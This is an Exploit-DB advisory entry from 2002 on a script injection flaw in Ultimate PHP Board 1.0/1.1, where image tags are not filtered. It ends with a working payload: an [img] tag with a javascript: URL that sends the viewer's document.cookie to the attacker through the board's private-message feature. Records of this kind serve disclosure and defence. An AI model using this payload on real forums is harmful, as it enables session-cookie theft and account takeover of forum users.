Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection

EDB-ID:

21423

CVE:



Author:

frog

Type:

webapps


Platform:

PHP

Date:

2002-04-25


source: https://www.securityfocus.com/bid/4603/info

Ultimate PHP Board (UPB) is web forum software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

Ultimate PHP Board does not filter script code from image tags. This may allow an attacker to include script code in forum messages. Injected script code will be executed in the browser of an arbitrary web user who views the malicious forum message, in the context of the website running UPB.

It may be possible to inject script code into other UPB-Code formatting tags, though this has not been confirmed. 

[ img]javascript:window.open(' index.php?upb=pm&mode=send&send=yes&target_id=SONPROPREID&betreff=cookie&pm=' +document.cookie+ ' &smilies=1&use_upbcode=1&pmbox_id=IDDELAVICTIME&check=yes ')[/img ]